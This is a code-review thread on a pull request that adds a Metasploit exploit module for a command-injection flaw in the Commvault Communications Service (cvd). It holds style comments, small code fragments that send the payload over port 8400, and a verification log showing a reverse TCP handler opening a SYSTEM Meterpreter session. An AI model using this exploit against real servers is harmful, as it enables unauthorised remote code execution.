Commvault Remote Command Injection

[rwincey]

Command Injection Exploit for Commvault Communications Service (cvd) v11 SP5 and earlier versions

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/misc/commvault_cmd_exec
• ...
• Shellz

[bcoles]

Privileged should probably be true if the default configuration results in a shell as SYSTEM, given that the module only supports Windows targets.

[bcoles]

Contains a redundant ,

Could also be rewritten as:

register_options([Opt::RPORT(8400)])

[bcoles]

Redundant ()

[bcoles]

Executing payload should probably go after the connect method and Connected to Commvault Communications Service message.

Perhaps consider:

    # Connect
    print_status("Connecting to Commvault Communications Service.")
    connect

    # Send the payload
    print_status("Executing payload")
    sock.put(buf)

[bcoles]

return is redundant when used as the last line of a method.

[bcoles]

As string interpolation isn't required, this can be replaced with:

cmd_path = 'C:\Windows\System32\cmd.exe'

Does the exploit work with %COMSPEC% ? This may have the added benefit of working on system which have Windows directory mounted elsewhere.

[rwincey]

Unfortunately this is a file path passed to CreateProcess so it cannot be %COMSPEC%.

[bcoles]

Is this required? It gets re-initialized later at line 98.

[bcoles]

Redundant ()

[bcoles]

Looks like msftidy flagged some errant whitespace:

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/windows/misc/commvault_cmd_exec.rb:21 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:22 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:53 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:56 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:62 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:71 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:80 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:96 - [WARNING] Spaces at EOL
modules/exploits/windows/misc/commvault_cmd_exec.rb:99 - [WARNING] Spaces at EOL

[rwincey]

Requested changes have been committed.

[wchen-r7]

Trying to verify this exploit, but it seems the vendor cannot even provide a trial version for download.

[wchen-r7]

Verified! Works as advertised:

msf exploit(windows/misc/commvault_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.0.12:4444 
[*] 192.168.0.15:8400 - Connecting to Commvault Communications Service.
[*] 192.168.0.15:8400 - Executing payload
[*] Sending stage (179779 bytes) to 192.168.0.15
[*] Meterpreter session 1 opened (192.168.0.12:4444 -> 192.168.0.15:49196) at 2018-01-07 09:28:56 -0600

meterpreter >

I will be landing this PR shortly :-)

[wchen-r7]

Release Notes

This module exploits a command injection in Commvault's CVD process, which results in arbitrary remote code execution under the context of SYSTEM.